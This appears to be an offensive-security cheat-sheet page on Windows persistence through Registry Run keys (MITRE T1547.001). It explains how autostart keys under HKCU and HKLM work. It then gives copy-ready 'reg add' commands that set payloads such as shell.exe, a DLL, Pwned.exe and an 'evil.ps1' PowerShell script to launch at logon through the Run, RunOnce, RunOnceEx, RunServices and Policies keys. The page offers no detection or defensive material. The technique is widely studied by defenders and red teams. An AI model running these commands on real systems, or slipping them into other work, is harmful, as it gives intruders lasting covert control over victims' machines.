Run Keys Persistence
MITRE ATT&CK™ Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder - Technique T1547.001
Theory
A classic and widely used persistence technique involves adding an entry to the Registry "Run" keys, causing a specified program to execute automatically when a user logs in. This ensures that the attacker’s payload is launched every time the system starts or a user session begins.
Trigger Condition:
The execution of the referenced program occurs when a user logs in to Windows. The specific privilege level of the executed process depends on the security context of the affected user account:
If added under
HKCU\Software\Microsoft\Windows\CurrentVersion\Run, the program runs in the context of the current user.If added under
HKLM\Software\Microsoft\Windows\CurrentVersion\Run, the program executes for all users on the system, requiring Administrator privileges to modify.
This technique is simple, effective, and often overlooked, making it a popular choice for persistence in both malware and post-exploitation scenarios.
Practice
Registry entries under HKU/HKCU will only apply to the user.
Registry entries under HKLM will apply to everyone
You can force a user to execute a program on logon via the Run and RunOnce and RunOnceEx registry keys. You can use the following registry entries to specify applications to run at logon:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunHKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceHKLM\Software\Microsoft\Windows\CurrentVersion\RunHKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceHKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
The RunOnceEx key entries can reference programs directly or list them as a dependency. For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx.
#Run/RunOnce
## Add key for current user
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v PeMalware /t REG_SZ /d "C:\Users\user1\shell.exe"
## Add key for computer (all users)
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v PeMalware /t REG_SZ /d "C:\Users\user1\shell.exe"
#RunOnceEx
#Add key for current user - Execute command / PE
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceEx\0001" /v PeMalware /t REG_SZ /d "C:\tmp\shell.exe"
#Add key for computer (all users) - Execute DLL
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend" /v DLLMalware /t REG_SZ /d "C:\tmp\shell.dll"The following Registry keys can control automatic startup of services during boot:
HKU\<SID>\Software\Microsoft\Windows\CurrentVersion\RunServicesHKU\<SID>\Software\Microsoft\Windows\CurrentVersion\RunServicesOnceHKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesHKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
#Add key for current user - Execute command / PE
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Pwned /t REG_SZ /d "C:\tmp\Pwned.exe"
#Add key for computer (all users) - Execute command / PE
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Pwned /t REG_SZ /d "C:\tmp\Pwned.exe"We can use policy settings to specify startup programs with following registry keys
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
#Add key for current user - Execute command / PE
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v Pwned /t REG_SZ /d "C:\tmp\Pwned.exe"
#Add key for computer (all users) - Execute command
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v Pwned /t REG_SZ /d "powershell.exe C:\tmp\evil.ps1"References
Last updated
Was this helpful?